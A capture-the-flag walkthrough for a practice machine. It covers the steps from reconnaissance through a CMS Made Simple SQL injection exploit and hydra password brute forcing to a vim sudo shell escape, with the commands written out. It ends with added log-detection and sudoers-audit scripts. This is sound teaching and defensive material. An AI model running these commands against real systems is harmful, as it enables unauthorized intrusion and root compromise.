Simple CTF

Reconnaissance

Let's start with an initial nmap scan to find open ports.

nmap -Pn 10.10.221.224

Detailed Nmap Scan:

Command Breakdown:

  • (-sV): Service version detection

  • (-sC): Run the default nmap scripts

  • (-p): Specify the ports 21, 80 and 2222

  • (-oN nmap): Save the output to a file called nmap

nmap -sC -sV -p 21,80,2222 -oN nmap 10.10.221.224

With this information we can answer the first two questions.

Enumeration

Port 21

Let's start by enumerating FTP (port 21), since the nmap scan shows that anonymous login is allowed.

ftp 10.10.221.224

After listing the contents, we can see that there is a directory called pub, and inside it a file called ForMitch.txt. Let's transfer it to our machine using the get command.

get ForMitch.txt

After reading the file we transferred, we learn that Mitch set the password for the system user and that the password is weak.

cat ForMitch.txt

Port 80

Let's visit the website.

It's the default Apache2 Ubuntu page, so let's visit robots.txt, since our nmap scan showed an entry of interest related to it.

We can see that there is a directory called /openemr-5_0_1_3, so let's visit it.

It is not found, so let's try finding hidden directories using a tool called Gobuster.

Command Breakdown:

  • (-w): Specify the wordlist

  • (-u): Specify the target URL

gobuster dir -w /usr/share/wordlists/dirbuster/common.txt -u http://10.10.221.224

The directory called /simple looks interesting, so let's visit it.

It's a CMS Made Simple application, and scrolling down a bit we can see its version.

Let's look for exploits for it using searchsploit.

searchsploit cms made simple 2.2.8

It looks like a SQL injection exploit; let's use it against this machine.

Exploitation

Searching for this on exploit-db gives us the answers to questions 3 and 4.

Let's download the exploit.

searchsploit -m php/webapps/46635.py

Now let's launch it against the server, but first we need to make some changes to the script, since we are going to run it with python3. First, we need to add parentheses around the print statements (the script was written for Python 2).

[The three before/after screenshots of the edited print statements are not reproduced here.]

Now we can run the exploit with some options: the target URL (-u), a wordlist to crack the password (-w) and the flag that tells the exploit to crack the password (-c), all described in the exploit itself.

python3 46635.py -u http://10.10.221.224/simple -w /usr/share/wordlists/rockyou.txt -c

We found the password: secret. This exploit does not always work, so we can also try cracking the password with a tool called hydra.

hydra -l mitch -P /usr/share/wordlists/rockyou.txt 10.10.221.224 http-post-form "/simple/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:User name or password incorrect"
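Both the Gobuster directory scan above and the hydra run against the login form leave an unmistakable trace in the web server's access log. The following is an added example, not part of the original writeup, showing what an Apache admin would look for to spot each phase: a burst of 404s from one client for the wordlist scan, and repeated POSTs to the login page from one client for the password guessing. The log lines, IP addresses, user agents and thresholds are constructed assumptions, not captures from the room.

```shell
#!/bin/sh
# Added example, not part of the original writeup: a log-side view of the two
# noisy phases above, directory brute forcing (gobuster) and login brute forcing
# (hydra), as an Apache admin would see them. The log lines, IPs, paths and
# thresholds below are constructed assumptions, not captures from the room.

LOGFILE="$(mktemp)"
trap 'rm -f "$LOGFILE"' EXIT

# Constructed Apache combined-format access log: 10.0.0.5 is an ordinary
# visitor, 10.0.0.9 walks a wordlist (many 404s), 10.0.0.7 hammers the login.
cat > "$LOGFILE" <<'EOF'
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 11321 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /robots.txt HTTP/1.1" 200 52 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "POST /simple/admin/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /admin HTTP/1.1" 404 274 "-" "gobuster/3.1"
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /backup HTTP/1.1" 404 274 "-" "gobuster/3.1"
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /cgi-bin HTTP/1.1" 404 274 "-" "gobuster/3.1"
10.0.0.9 - - [01/Jan/2024:10:01:01 +0000] "GET /images HTTP/1.1" 404 274 "-" "gobuster/3.1"
10.0.0.9 - - [01/Jan/2024:10:01:01 +0000] "GET /old HTTP/1.1" 404 274 "-" "gobuster/3.1"
10.0.0.9 - - [01/Jan/2024:10:01:01 +0000] "GET /simple HTTP/1.1" 301 313 "-" "gobuster/3.1"
10.0.0.9 - - [01/Jan/2024:10:01:02 +0000] "GET /test HTTP/1.1" 404 274 "-" "gobuster/3.1"
10.0.0.7 - - [01/Jan/2024:10:02:00 +0000] "POST /simple/admin/login.php HTTP/1.0" 200 1834 "-" "Mozilla/5.0 (Hydra)"
10.0.0.7 - - [01/Jan/2024:10:02:00 +0000] "POST /simple/admin/login.php HTTP/1.0" 200 1834 "-" "Mozilla/5.0 (Hydra)"
10.0.0.7 - - [01/Jan/2024:10:02:00 +0000] "POST /simple/admin/login.php HTTP/1.0" 200 1834 "-" "Mozilla/5.0 (Hydra)"
10.0.0.7 - - [01/Jan/2024:10:02:01 +0000] "POST /simple/admin/login.php HTTP/1.0" 200 1834 "-" "Mozilla/5.0 (Hydra)"
10.0.0.7 - - [01/Jan/2024:10:02:01 +0000] "POST /simple/admin/login.php HTTP/1.0" 200 1834 "-" "Mozilla/5.0 (Hydra)"
10.0.0.7 - - [01/Jan/2024:10:02:01 +0000] "POST /simple/admin/login.php HTTP/1.0" 200 1834 "-" "Mozilla/5.0 (Hydra)"
EOF

# In the combined format, $1 is the client IP, $6 is the quoted method
# ("GET, "POST), $7 is the request path and $9 is the HTTP status code.

# IPs whose 404 count exceeds THRESHOLD: the signature of a wordlist scan.
# usage: dir_bruteforce_ips LOGFILE THRESHOLD
dir_bruteforce_ips() {
    awk -v t="$2" '$9 == 404 { n[$1]++ }
        END { for (ip in n) if (n[ip] > t) print ip }' "$1" | sort
}

# IPs that POST to LOGIN_PATH more than THRESHOLD times: password guessing.
# A legitimate user posts to the login form once or twice, not dozens of times.
# usage: login_bruteforce_ips LOGFILE LOGIN_PATH THRESHOLD
login_bruteforce_ips() {
    awk -v p="$2" -v t="$3" '$6 == "\"POST" && $7 == p { n[$1]++ }
        END { for (ip in n) if (n[ip] > t) print ip }' "$1" | sort
}

# Stand-alone run: print both findings against the constructed log.
echo "directory brute force from: $(dir_bruteforce_ips "$LOGFILE" 5)"
echo "login brute force from:     $(login_bruteforce_ips "$LOGFILE" /simple/admin/login.php 5)"
```

On a real server the same two counters feed a rate limit or fail2ban-style ban rule; the thresholds are the tunable part, and the 404 counter should be read per time window rather than over a whole log file, which this small example does not do.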

Now we can SSH into the machine (on port 2222, as found by nmap) using these credentials.

ssh mitch@10.10.221.224 -p 2222

Privilege Escalation

For privilege escalation, one of the first commands we run is sudo -l, which lists the commands we are allowed to run with sudo on the machine.

sudo -l

We are allowed to run /usr/bin/vim as root, so we can visit GTFOBins, a site that catalogues how such binaries can be used to escalate privileges.

Search for vim on the site and look at the sudo section, since we are allowed to run /usr/bin/vim as root.

After running the first command listed there, you are root.

sudo vim -c ':!/bin/sh'
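The root cause here is a sudoers rule that lets a user run an interactive editor as root. As an added example, not part of the original writeup, here is a small audit that reads a sudoers-style file and reports every plain user rule granting an editor or pager with a command escape, together with the tags on that rule. The sudoers content, user names, file paths and the binary list are constructed assumptions.

```shell
#!/bin/sh
# Added example, not part of the original writeup: an audit of sudoers rules
# for the weakness exploited above. A rule that runs an interactive editor or
# pager as root hands the user a root shell through the program's own command
# escape, so every such rule is a finding. The sudoers content, user names and
# paths are constructed assumptions, and the binary list is deliberately short.

SUDOERS_SAMPLE="$(mktemp)"
trap 'rm -f "$SUDOERS_SAMPLE"' EXIT

cat > "$SUDOERS_SAMPLE" <<'EOF'
# constructed sudoers content for the audit below
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
mitch   ALL=(root) NOPASSWD: /usr/bin/vim
alice   ALL=(root) sudoedit /etc/hosts
bob     ALL=(root) /usr/bin/less /var/log/syslog, /usr/bin/systemctl status apache2
carol   ALL=(root) NOEXEC: /usr/bin/vim /etc/apache2/sites-available/000-default.conf
EOF

# Editors and pagers with a built-in shell or command escape (":!" in vim,
# "!" in less and more; man hands its output to a pager).
ESCAPE_BINS="vim vi nano less more man"

# Print "user binary tags" for every plain user rule that grants one of
# ESCAPE_BINS, sorted. Handles "user host=(runas) [TAG:] cmd, cmd" lines only;
# aliases and @include directives are out of scope for this small audit.
# usage: risky_sudo_rules SUDOERS_FILE
risky_sudo_rules() {
    awk -v bins="$ESCAPE_BINS" '
        BEGIN { n = split(bins, b, " "); for (i = 1; i <= n; i++) want[b[i]] = 1 }
        /^[[:space:]]*#/ || /^[[:space:]]*$/ || /^Defaults/ { next }
        /^(User|Host|Cmnd|Runas)_Alias/ { next }
        {
            line = $0
            sub(/^[^=]*=/, "", line)                 # keep the part after "host="
            sub(/^\([^)]*\)[[:space:]]*/, "", line)  # drop the (runas) spec
            m = split(line, chunks, ",")
            tags = ""                                # a tag persists across the comma list
            for (i = 1; i <= m; i++) {
                k = split(chunks[i], tok, " ")
                j = 1
                while (j <= k && tok[j] ~ /^[A-Z]+:$/) {
                    name = substr(tok[j], 1, length(tok[j]) - 1)
                    tags = tags (tags == "" ? "" : "+") name
                    j++
                }
                if (j > k) continue
                cmd = tok[j]; sub(/.*\//, "", cmd)   # basename of the command
                if (cmd in want) print $1, cmd, (tags == "" ? "-" : tags)
            }
        }' "$1" | sort
}

# Stand-alone run: list the risky rules in the constructed file.
risky_sudo_rules "$SUDOERS_SAMPLE"
```

The fix for the mitch rule is a different mechanism, not a different editor: sudoedit (alice's rule) copies the target file, runs the editor as the invoking user, and writes the result back as root, so a :! escape only ever yields the user's own shell. The NOEXEC tag on carol's rule blocks the escape by stopping vim from executing other programs, but vim itself still runs as root and can write any file it likes, so the audit reports it as a finding with a partial mitigation rather than a clean rule.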
